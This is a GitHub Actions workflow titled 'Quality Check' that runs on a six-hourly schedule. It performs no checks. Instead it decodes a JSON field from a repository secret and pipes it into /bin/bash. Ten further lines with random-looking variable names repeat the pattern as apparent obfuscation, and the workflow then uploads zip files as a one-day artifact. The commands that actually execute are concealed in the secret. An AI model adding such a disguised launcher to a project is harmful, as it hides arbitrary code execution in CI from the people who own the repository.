name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '25 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          m452: ${{ secrets.m452 }}
        run: |
          printf '%s' "$m452" | jq -r .pgrp7 | /bin/bash
          printf '%s' "$rplvg1" | jq -r .twc729 | /bin/bash
          echo $kdb9964 | jq -r .vuvx2 | /bin/bash
          printf '%s' "$a9024" | jq -r .efavj2648 | /bin/bash
          printf '%s' "$r712" | jq -r .rlu0804 | /bin/bash
          printf '%s' "$gxvh510" | jq -r .urky3 | /bin/bash
          echo $h18 | jq -r .l5 | /bin/bash
          echo $nv20609 | jq -r .wahij2 | /bin/bash
          echo $m05979 | jq -r .dsyv9 | /bin/bash
          echo $vy38 | jq -r .ehkqt52622 | /bin/bash
          printf '%s' "$kch95477" | jq -r .ahra0668 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: MMw6adKC
          path: "*.zip"
          retention-days: 1
